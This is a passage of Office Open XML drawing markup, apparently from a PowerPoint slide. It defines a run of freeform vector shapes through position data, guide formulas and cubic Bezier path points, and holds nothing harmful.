                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="155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6" name="Freeform 741">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBF3B9AD-03AC-496F-AC07-4C26191FA13F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928813" y="3176588"/>
              <a:ext cx="60325" cy="180975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 132"/>
                <a:gd name="T1" fmla="*/ 373 h 387"/>
                <a:gd name="T2" fmla="*/ 120 w 132"/>
                <a:gd name="T3" fmla="*/ 358 h 387"/>
                <a:gd name="T4" fmla="*/ 35 w 132"/>
                <a:gd name="T5" fmla="*/ 194 h 387"/>
                <a:gd name="T6" fmla="*/ 121 w 132"/>
                <a:gd name="T7" fmla="*/ 29 h 387"/>
                <a:gd name="T8" fmla="*/ 132 w 132"/>
                <a:gd name="T9" fmla="*/ 14 h 387"/>
                <a:gd name="T10" fmla="*/ 117 w 132"/>
                <a:gd name="T11" fmla="*/ 0 h 387"/>
                <a:gd name="T12" fmla="*/ 0 w 132"/>
                <a:gd name="T13" fmla="*/ 194 h 387"/>
                <a:gd name="T14" fmla="*/ 41 w 132"/>
                <a:gd name="T15" fmla="*/ 323 h 387"/>
                <a:gd name="T16" fmla="*/ 117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6"/>
                    <a:pt x="129" y="364"/>
                    <a:pt x="120" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="316"/>
                    <a:pt x="35" y="250"/>
                    <a:pt x="35" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="144"/>
                    <a:pt x="54" y="74"/>
                    <a:pt x="121" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="24"/>
                    <a:pt x="132" y="22"/>
                    <a:pt x="132" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="10"/>
                    <a:pt x="130" y="0"/>
                    <a:pt x="117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1" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="359"/>
                    <a:pt x="105" y="387"/>
                    <a:pt x="117" y="387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130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7" name="Freeform 742">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C94F2A0-7150-4F24-A941-DC975DC2ECB0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025650" y="3236913"/>
              <a:ext cx="90488" cy="103188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2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2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="88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8" name="Freeform 743">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC3E78A0-8E23-4749-9271-05A36EEFDBE7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141538" y="3236913"/>
              <a:ext cx="95250" cy="103188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 204 w 204"/>
                <a:gd name="T1" fmla="*/ 112 h 222"/>
                <a:gd name="T2" fmla="*/ 102 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 204"/>
                <a:gd name="T5" fmla="*/ 112 h 222"/>
                <a:gd name="T6" fmla="*/ 102 w 204"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 204 w 204"/>
                <a:gd name="T9" fmla="*/ 112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9" name="Freeform 744">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{885A8252-B541-4B38-AC51-509C2B38E34E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252663" y="3236913"/>
              <a:ext cx="114300" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 249"/>
                <a:gd name="T1" fmla="*/ 27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20 w 249"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 42 w 249"/>
                <a:gd name="T11" fmla="*/ 34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8 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 100 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 31 h 218"/>
                <a:gd name="T32" fmla="*/ 172 w 249"/>
                <a:gd name="T33" fmla="*/ 75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0" name="Freeform 745">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E951349D-361D-4F41-BC95-75E31433E475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386013" y="3236913"/>
              <a:ext cx="88900" cy="103188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8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8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1" name="Freeform 746">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3221B183-EF04-4739-8CBA-4DA6970173B2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495550" y="3209925"/>
              <a:ext cx="96838" cy="130175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77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7 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92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2" name="Freeform 747">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B6C952F-7B38-46B8-A064-EE4B3FF1FE29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746375" y="3236913"/>
              <a:ext cx="90488" cy="103188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2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2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="88"/>
                    <a:pt x="49" y="30"/>
                    <a:pt x="116" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="30"/>
                    <a:pt x="146" y="30"/>
                    <a:pt x="146" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147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3" name="Freeform 748">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4E910AE-7A80-499A-B9CC-BEF54B451615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2852738" y="3195638"/>
              <a:ext cx="114300" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 206 w 249"/>
                <a:gd name="T1" fmla="*/ 158 h 304"/>
                <a:gd name="T2" fmla="*/ 142 w 249"/>
                <a:gd name="T3" fmla="*/ 86 h 304"/>
                <a:gd name="T4" fmla="*/ 76 w 249"/>
                <a:gd name="T5" fmla="*/ 113 h 304"/>
                <a:gd name="T6" fmla="*/ 76 w 249"/>
                <a:gd name="T7" fmla="*/ 20 h 304"/>
                <a:gd name="T8" fmla="*/ 56 w 249"/>
                <a:gd name="T9" fmla="*/ 0 h 304"/>
                <a:gd name="T10" fmla="*/ 20 w 249"/>
                <a:gd name="T11" fmla="*/ 0 h 304"/>
                <a:gd name="T12" fmla="*/ 0 w 249"/>
                <a:gd name="T13" fmla="*/ 15 h 304"/>
                <a:gd name="T14" fmla="*/ 19 w 249"/>
                <a:gd name="T15" fmla="*/ 30 h 304"/>
                <a:gd name="T16" fmla="*/ 42 w 249"/>
                <a:gd name="T17" fmla="*/ 30 h 304"/>
                <a:gd name="T18" fmla="*/ 42 w 249"/>
                <a:gd name="T19" fmla="*/ 274 h 304"/>
                <a:gd name="T20" fmla="*/ 20 w 249"/>
                <a:gd name="T21" fmla="*/ 274 h 304"/>
                <a:gd name="T22" fmla="*/ 0 w 249"/>
                <a:gd name="T23" fmla="*/ 289 h 304"/>
                <a:gd name="T24" fmla="*/ 19 w 249"/>
                <a:gd name="T25" fmla="*/ 304 h 304"/>
                <a:gd name="T26" fmla="*/ 99 w 249"/>
                <a:gd name="T27" fmla="*/ 304 h 304"/>
                <a:gd name="T28" fmla="*/ 119 w 249"/>
                <a:gd name="T29" fmla="*/ 289 h 304"/>
                <a:gd name="T30" fmla="*/ 98 w 249"/>
                <a:gd name="T31" fmla="*/ 274 h 304"/>
                <a:gd name="T32" fmla="*/ 76 w 249"/>
                <a:gd name="T33" fmla="*/ 274 h 304"/>
                <a:gd name="T34" fmla="*/ 76 w 249"/>
                <a:gd name="T35" fmla="*/ 186 h 304"/>
                <a:gd name="T36" fmla="*/ 139 w 249"/>
                <a:gd name="T37" fmla="*/ 117 h 304"/>
                <a:gd name="T38" fmla="*/ 172 w 249"/>
                <a:gd name="T39" fmla="*/ 161 h 304"/>
                <a:gd name="T40" fmla="*/ 172 w 249"/>
                <a:gd name="T41" fmla="*/ 274 h 304"/>
                <a:gd name="T42" fmla="*/ 153 w 249"/>
                <a:gd name="T43" fmla="*/ 274 h 304"/>
                <a:gd name="T44" fmla="*/ 132 w 249"/>
                <a:gd name="T45" fmla="*/ 289 h 304"/>
                <a:gd name="T46" fmla="*/ 153 w 249"/>
                <a:gd name="T47" fmla="*/ 304 h 304"/>
                <a:gd name="T48" fmla="*/ 229 w 249"/>
                <a:gd name="T49" fmla="*/ 304 h 304"/>
                <a:gd name="T50" fmla="*/ 249 w 249"/>
                <a:gd name="T51" fmla="*/ 289 h 304"/>
                <a:gd name="T52" fmla="*/ 228 w 249"/>
                <a:gd name="T53" fmla="*/ 274 h 304"/>
                <a:gd name="T54" fmla="*/ 206 w 249"/>
                <a:gd name="T55" fmla="*/ 274 h 304"/>
                <a:gd name="T56" fmla="*/ 206 w 249"/>
                <a:gd name="T57" fmla="*/ 15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4">
                  <a:moveTo>
                    <a:pt x="206" y="158"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="108"/>
                    <a:pt x="181" y="86"/>
                    <a:pt x="142" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="86"/>
                    <a:pt x="86" y="103"/>
                    <a:pt x="76" y="113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19" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42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89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="12" y="304"/>
                    <a:pt x="19" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="304"/>
                    <a:pt x="119" y="304"/>
                    <a:pt x="119" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="274"/>
                    <a:pt x="106" y="274"/>
                    <a:pt x="98" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="186"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="136"/>
                    <a:pt x="113" y="117"/>
                    <a:pt x="139" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="117"/>
                    <a:pt x="172" y="131"/>
                    <a:pt x="172" y="161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="274"/>
                    <a:pt x="132" y="274"/>
                    <a:pt x="132" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="304"/>
                    <a:pt x="146" y="304"/>
                    <a:pt x="153" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="304"/>
                    <a:pt x="249" y="304"/>
                    <a:pt x="249" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="274"/>
                    <a:pt x="236" y="274"/>
                    <a:pt x="228" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="206" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206" y="1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4" name="Freeform 749">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E3D9BC4-DFAF-4226-B7A6-CD546592C4DA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2982913" y="3236913"/>
              <a:ext cx="107950" cy="103188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 156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6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1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3 w 234"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 156 w 234"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 150 w 234"/>
                <a:gd name="T33" fmla="*/ 111 h 222"/>
                <a:gd name="T34" fmla="*/ 150 w 234"/>
                <a:gd name="T35" fmla="*/ 152 h 222"/>
                <a:gd name="T36" fmla="*/ 131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6" y="203"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="167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8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3"/>
                    <a:pt x="0" y="108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6" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="111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1" y="183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5" name="Freeform 750">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F96E8CD0-755D-4B49-846F-CC7AC9E47796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098800" y="3236913"/>
              <a:ext cx="103188" cy="101600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1 h 218"/>
                <a:gd name="T4" fmla="*/ 205 w 226"/>
                <a:gd name="T5" fmla="*/ 53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1 h 218"/>
                <a:gd name="T12" fmla="*/ 94 w 226"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 74 w 226"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 19 w 226"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 226"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 19 w 226"/>
                <a:gd name="T21" fmla="*/ 34 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 226"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 226"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 19 w 226"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 226"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 19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8 h 218"/>
                <a:gd name="T38" fmla="*/ 94 w 226"/>
                <a:gd name="T39" fmla="*/ 188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5" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="53"/>
                    <a:pt x="226" y="45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19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19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19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6" name="Freeform 751">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA9D65FB-0CE9-4A5F-9669-3B9B40A37036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346450" y="3216275"/>
              <a:ext cx="88900" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 111 w 193"/>
                <a:gd name="T1" fmla="*/ 134 h 215"/>
                <a:gd name="T2" fmla="*/ 158 w 193"/>
                <a:gd name="T3" fmla="*/ 162 h 215"/>
                <a:gd name="T4" fmla="*/ 177 w 193"/>
                <a:gd name="T5" fmla="*/ 170 h 215"/>
                <a:gd name="T6" fmla="*/ 193 w 193"/>
                <a:gd name="T7" fmla="*/ 154 h 215"/>
                <a:gd name="T8" fmla="*/ 186 w 193"/>
                <a:gd name="T9" fmla="*/ 140 h 215"/>
                <a:gd name="T10" fmla="*/ 127 w 193"/>
                <a:gd name="T11" fmla="*/ 108 h 215"/>
                <a:gd name="T12" fmla="*/ 181 w 193"/>
                <a:gd name="T13" fmla="*/ 79 h 215"/>
                <a:gd name="T14" fmla="*/ 193 w 193"/>
                <a:gd name="T15" fmla="*/ 62 h 215"/>
                <a:gd name="T16" fmla="*/ 173 w 193"/>
                <a:gd name="T17" fmla="*/ 46 h 215"/>
                <a:gd name="T18" fmla="*/ 111 w 193"/>
                <a:gd name="T19" fmla="*/ 82 h 215"/>
                <a:gd name="T20" fmla="*/ 113 w 193"/>
                <a:gd name="T21" fmla="*/ 21 h 215"/>
                <a:gd name="T22" fmla="*/ 96 w 193"/>
                <a:gd name="T23" fmla="*/ 0 h 215"/>
                <a:gd name="T24" fmla="*/ 80 w 193"/>
                <a:gd name="T25" fmla="*/ 21 h 215"/>
                <a:gd name="T26" fmla="*/ 81 w 193"/>
                <a:gd name="T27" fmla="*/ 82 h 215"/>
                <a:gd name="T28" fmla="*/ 27 w 193"/>
                <a:gd name="T29" fmla="*/ 50 h 215"/>
                <a:gd name="T30" fmla="*/ 16 w 193"/>
                <a:gd name="T31" fmla="*/ 46 h 215"/>
                <a:gd name="T32" fmla="*/ 0 w 193"/>
                <a:gd name="T33" fmla="*/ 62 h 215"/>
                <a:gd name="T34" fmla="*/ 11 w 193"/>
                <a:gd name="T35" fmla="*/ 78 h 215"/>
                <a:gd name="T36" fmla="*/ 66 w 193"/>
                <a:gd name="T37" fmla="*/ 108 h 215"/>
                <a:gd name="T38" fmla="*/ 12 w 193"/>
                <a:gd name="T39" fmla="*/ 137 h 215"/>
                <a:gd name="T40" fmla="*/ 0 w 193"/>
                <a:gd name="T41" fmla="*/ 154 h 215"/>
                <a:gd name="T42" fmla="*/ 19 w 193"/>
                <a:gd name="T43" fmla="*/ 170 h 215"/>
                <a:gd name="T44" fmla="*/ 81 w 193"/>
                <a:gd name="T45" fmla="*/ 134 h 215"/>
                <a:gd name="T46" fmla="*/ 80 w 193"/>
                <a:gd name="T47" fmla="*/ 194 h 215"/>
                <a:gd name="T48" fmla="*/ 96 w 193"/>
                <a:gd name="T49" fmla="*/ 215 h 215"/>
                <a:gd name="T50" fmla="*/ 113 w 193"/>
                <a:gd name="T51" fmla="*/ 194 h 215"/>
                <a:gd name="T52" fmla="*/ 111 w 193"/>
                <a:gd name="T53" fmla="*/ 13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11" y="134"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="151"/>
                    <a:pt x="123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6" y="170"/>
                    <a:pt x="193" y="161"/>
                    <a:pt x="193" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="145"/>
                    <a:pt x="187" y="141"/>
                    <a:pt x="186" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="132"/>
                    <a:pt x="140" y="115"/>
                    <a:pt x="127" y="108"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="181" y="79"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="75"/>
                    <a:pt x="193" y="72"/>
                    <a:pt x="193" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="60"/>
                    <a:pt x="193" y="46"/>
                    <a:pt x="173" y="46"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="82"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="69"/>
                    <a:pt x="113" y="36"/>
                    <a:pt x="113" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="17"/>
                    <a:pt x="113" y="0"/>
                    <a:pt x="96" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="0"/>
                    <a:pt x="80" y="17"/>
                    <a:pt x="80" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="36"/>
                    <a:pt x="80" y="69"/>
                    <a:pt x="81" y="82"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="27" y="50"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="46"/>
                    <a:pt x="19" y="46"/>
                    <a:pt x="16" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="46"/>
                    <a:pt x="0" y="55"/>
                    <a:pt x="0" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="72"/>
                    <a:pt x="5" y="75"/>
                    <a:pt x="11" y="78"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="66" y="108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="141"/>
                    <a:pt x="0" y="144"/>
                    <a:pt x="0" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="156"/>
                    <a:pt x="0" y="170"/>
                    <a:pt x="19" y="170"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="134"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="147"/>
                    <a:pt x="80" y="180"/>
                    <a:pt x="80" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="199"/>
                    <a:pt x="80" y="215"/>
                    <a:pt x="96" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="215"/>
                    <a:pt x="113" y="199"/>
                    <a:pt x="113" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="180"/>
                    <a:pt x="112" y="147"/>
                    <a:pt x="111" y="1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7" name="Freeform 752">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4D30CA2-92BF-46E2-B15F-9B3D7465981A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460750" y="3195638"/>
              <a:ext cx="90488" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 105 w 197"/>
                <a:gd name="T1" fmla="*/ 123 h 307"/>
                <a:gd name="T2" fmla="*/ 166 w 197"/>
                <a:gd name="T3" fmla="*/ 123 h 307"/>
                <a:gd name="T4" fmla="*/ 186 w 197"/>
                <a:gd name="T5" fmla="*/ 108 h 307"/>
                <a:gd name="T6" fmla="*/ 166 w 197"/>
                <a:gd name="T7" fmla="*/ 92 h 307"/>
                <a:gd name="T8" fmla="*/ 105 w 197"/>
                <a:gd name="T9" fmla="*/ 92 h 307"/>
                <a:gd name="T10" fmla="*/ 105 w 197"/>
                <a:gd name="T11" fmla="*/ 69 h 307"/>
                <a:gd name="T12" fmla="*/ 154 w 197"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 176 w 197"/>
                <a:gd name="T15" fmla="*/ 51 h 307"/>
                <a:gd name="T16" fmla="*/ 197 w 197"/>
                <a:gd name="T17" fmla="*/ 29 h 307"/>
                <a:gd name="T18" fmla="*/ 149 w 197"/>
                <a:gd name="T19" fmla="*/ 0 h 307"/>
                <a:gd name="T20" fmla="*/ 71 w 197"/>
                <a:gd name="T21" fmla="*/ 66 h 307"/>
                <a:gd name="T22" fmla="*/ 71 w 197"/>
                <a:gd name="T23" fmla="*/ 92 h 307"/>
                <a:gd name="T24" fmla="*/ 21 w 197"/>
                <a:gd name="T25" fmla="*/ 92 h 307"/>
                <a:gd name="T26" fmla="*/ 1 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 307"/>
                <a:gd name="T28" fmla="*/ 21 w 197"/>
                <a:gd name="T29" fmla="*/ 123 h 307"/>
                <a:gd name="T30" fmla="*/ 71 w 197"/>
                <a:gd name="T31" fmla="*/ 123 h 307"/>
                <a:gd name="T32" fmla="*/ 71 w 197"/>
                <a:gd name="T33" fmla="*/ 277 h 307"/>
                <a:gd name="T34" fmla="*/ 21 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 307"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 307"/>
                <a:gd name="T38" fmla="*/ 21 w 197"/>
                <a:gd name="T39" fmla="*/ 307 h 307"/>
                <a:gd name="T40" fmla="*/ 156 w 197"/>
                <a:gd name="T41" fmla="*/ 307 h 307"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 292 h 307"/>
                <a:gd name="T44" fmla="*/ 156 w 197"/>
                <a:gd name="T45" fmla="*/ 277 h 307"/>
                <a:gd name="T46" fmla="*/ 105 w 197"/>
                <a:gd name="T47" fmla="*/ 277 h 307"/>
                <a:gd name="T48" fmla="*/ 105 w 197"/>
                <a:gd name="T49" fmla="*/ 12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6" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105" y="69"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="30"/>
                    <a:pt x="139" y="30"/>
                    <a:pt x="154" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="32"/>
                    <a:pt x="158" y="51"/>
                    <a:pt x="176" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="51"/>
                    <a:pt x="197" y="43"/>
                    <a:pt x="197" y="29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1" y="92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1" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156" y="307"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="307"/>
                    <a:pt x="176" y="307"/>
                    <a:pt x="176" y="292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8" name="Freeform 753">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{717929EC-1C8E-46F3-9941-292308554B85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3584575" y="3236913"/>
              <a:ext cx="93663" cy="103188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 205 w 205"/>
                <a:gd name="T1" fmla="*/ 112 h 222"/>
                <a:gd name="T2" fmla="*/ 102 w 205"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 205"/>
                <a:gd name="T5" fmla="*/ 112 h 222"/>
                <a:gd name="T6" fmla="*/ 102 w 205"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 205 w 205"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 102 w 205"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 34 w 205"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 102 w 205"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 205"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 102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2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5" y="174"/>
                    <a:pt x="205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9" name="Freeform 754">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{871AB8DC-B590-471B-82D5-24C027C71921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3698875" y="3236913"/>
              <a:ext cx="104775" cy="101600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1 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53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1 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 24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4 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 227"/>
                <a:gd name="T23" fmla="*/ 34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9"/>
                    <a:pt x="124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0" name="Freeform 755">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{379FE2EE-CB64-4210-AF7D-E33F2F3EA240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810000" y="3236913"/>
              <a:ext cx="119063" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
